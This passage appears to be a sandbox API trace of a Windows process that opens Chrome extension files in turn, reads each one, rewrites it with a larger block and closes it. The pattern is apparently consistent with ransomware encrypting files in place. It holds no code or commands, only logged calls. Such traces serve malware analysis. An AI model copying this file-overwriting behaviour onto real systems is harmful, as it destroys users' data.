lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.926] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2d5f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0167.927] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.927] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0167.928] CloseHandle (hObject=0x20c) returned 1 [0167.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0167.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x96 [0167.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0167.929] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.929] ReleaseMutex (hMutex=0x168) returned 1 [0167.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.930] ReadFile (in: hFile=0x20c, lpBuffer=0x26b76e8, nNumberOfBytesToRead=0x96, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b76e8*, lpNumberOfBytesRead=0x2d5f2bc*=0x96, lpOverlapped=0x0) returned 1 [0167.930] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0167.931] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x61e, lpOverlapped=0x0) returned 1 [0167.931] CloseHandle (hObject=0x20c) returned 1 [0167.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xbe [0168.641] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.641] ReleaseMutex (hMutex=0x168) returned 1 [0168.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.642] ReadFile (in: hFile=0x20c, lpBuffer=0x26a0578, nNumberOfBytesToRead=0xbe, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a0578*, lpNumberOfBytesRead=0x2d5f2bc*=0xbe, lpOverlapped=0x0) returned 1 [0168.643] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.643] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x646, lpOverlapped=0x0) returned 1 [0168.643] CloseHandle (hObject=0x20c) returned 1 [0168.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.644] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.644] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x115 [0168.644] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.645] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.645] ReleaseMutex (hMutex=0x168) returned 1 [0168.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.645] ReadFile (in: hFile=0x20c, lpBuffer=0x291fe38, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x291fe38*, lpNumberOfBytesRead=0x2d5f2bc*=0x115, lpOverlapped=0x0) returned 1 [0168.646] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.646] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x69d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x69d, lpOverlapped=0x0) returned 1 [0168.647] CloseHandle (hObject=0x20c) returned 1 [0168.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.648] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.648] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4454 [0168.648] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.648] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.648] ReleaseMutex (hMutex=0x168) returned 1 [0168.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0168.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0168.648] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0168.650] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3454 [0168.651] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0168.651] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3454 [0168.652] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0168.652] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0168.652] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0168.652] CloseHandle (hObject=0x20c) returned 1 [0168.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.653] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.654] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa0 [0168.654] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.654] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.654] ReleaseMutex (hMutex=0x168) returned 1 [0168.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0168.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button.png", cchWideChar=26, lpMultiByteStr=0x1f8fedc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="topbar_floating_button.png", lpUsedDefaultChar=0x0) returned 26 [0168.654] ReadFile (in: hFile=0x20c, lpBuffer=0x26b76e8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b76e8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa0, lpOverlapped=0x0) returned 1 [0168.656] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.656] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x628, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x628, lpOverlapped=0x0) returned 1 [0168.656] CloseHandle (hObject=0x20c) returned 1 [0168.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.657] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.658] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x297 [0168.658] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.658] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.658] ReleaseMutex (hMutex=0x168) returned 1 [0168.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.658] ReadFile (in: hFile=0x20c, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x297, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x2d5f2bc*=0x297, lpOverlapped=0x0) returned 1 [0168.660] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.660] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x81f, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x81f, lpOverlapped=0x0) returned 1 [0168.661] CloseHandle (hObject=0x20c) returned 1 [0168.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.662] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.662] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x261 [0168.662] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.663] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.663] ReleaseMutex (hMutex=0x168) returned 1 [0168.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.663] ReadFile (in: hFile=0x20c, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x261, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2d5f2bc*=0x261, lpOverlapped=0x0) returned 1 [0168.665] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.665] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7e9, lpOverlapped=0x0) returned 1 [0168.665] CloseHandle (hObject=0x20c) returned 1 [0168.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.667] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.667] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x26e [0168.667] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.667] ReleaseMutex (hMutex=0x168) returned 1 [0168.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.667] ReadFile (in: hFile=0x20c, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x26e, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x2d5f2bc*=0x26e, lpOverlapped=0x0) returned 1 [0168.671] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.671] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x7f6, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7f6, lpOverlapped=0x0) returned 1 [0168.671] CloseHandle (hObject=0x20c) returned 1 [0168.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.672] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.672] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x29b [0168.672] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.672] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.672] ReleaseMutex (hMutex=0x168) returned 1 [0168.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.672] ReadFile (in: hFile=0x20c, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x29b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x2d5f2bc*=0x29b, lpOverlapped=0x0) returned 1 [0168.675] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0168.675] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x823, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x823, lpOverlapped=0x0) returned 1 [0168.675] CloseHandle (hObject=0x20c) returned 1 [0168.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 